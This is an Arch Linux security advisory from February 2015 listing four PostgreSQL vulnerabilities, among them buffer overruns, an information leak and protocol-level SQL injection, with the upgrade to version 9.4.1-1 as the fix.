[arch-security] [ASA-201502-4] postgresql: multiple issues

Fri Feb 6 11:16:07 UTC 2015

Arch Linux Security Advisory ASA-201502-4
=========================================

Severity: High
Date    : 2015-02-06
CVE-ID  : CVE-2014-8161 CVE-2015-0241 CVE-2015-0243 CVE-2015-0244
Package : postgresql
Type    : multiple issues
Remote  : Yes
Link    : https://wiki.archlinux.org/index.php/CVE

Summary
=======

The package postgresql before version 9.4.1-1 is vulnerable to multiple
issues, including information leak, denial of service, privilege
escalation and command injection.

Resolution
==========

Upgrade to 9.4.1-1.

# pacman -Syu "postgresql>=9.4.1-1"

The problem has been fixed upstream in version 9.4.1.

Workaround
==========

None.

Description
===========

- CVE-2014-8161 (information leak)

Some server error messages show the values of columns that violate a
constraint, such as a unique constraint. If the user does not have
SELECT privilege on all columns of the table, this could mean exposing
values that the user should not be able to see. Adjust the code so that
values are displayed only when they came from the SQL command or could
be selected by the user.

- CVE-2015-0241 (denial of service, privilege escalation)

When to_char() processes a numeric formatting template calling for a
large number of digits, PostgreSQL would read past the end of a buffer.
When processing a crafted timestamp formatting template, PostgreSQL
would write past the end of a buffer. Either case could crash the
server. We have not ruled out the possibility of attacks that lead to
privilege escalation, though they seem unlikely.

- CVE-2015-0243 (denial of service, privilege escalation)

Errors in memory size tracking within the pgcrypto module permitted
stack buffer overruns and improper dependence on the contents of
uninitialized memory. The buffer overrun cases can crash the server, and
we have not ruled out the possibility of attacks that lead to privilege
escalation.

- CVE-2015-0244 (command injection)

If any error occurred while the server was in the middle of reading a
protocol message from the client, it could lose synchronization and
incorrectly try to interpret part of the message's data as a new
protocol message. An attacker able to submit crafted binary data within
a command parameter might succeed in injecting his own SQL commands this
way. Statement timeout and query cancellation are the most likely
sources of errors triggering this scenario. Particularly vulnerable are
applications that use a timeout and also submit arbitrary user-crafted
data as binary query parameters. Disabling statement timeout will
reduce, but not eliminate, the risk of exploit. Our thanks to Emil
Lenngren for reporting this issue.

Impact
======

A remote, authenticated attacker might be able to get access to
sensitive information, escalate privileges or cause a denial of service
by crashing the server. A remote attacker could inject arbitrary SQL
command by submitting crafted binary data within a command parameter.

References
==========

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8161
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0241
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0243
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0244
http://www.postgresql.org/docs/9.4/static/release-9-4-1.html

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 819 bytes
Desc: OpenPGP digital signature
URL: <https://lists.archlinux.org/pipermail/arch-security/attachments/20150206/d2104456/attachment.asc>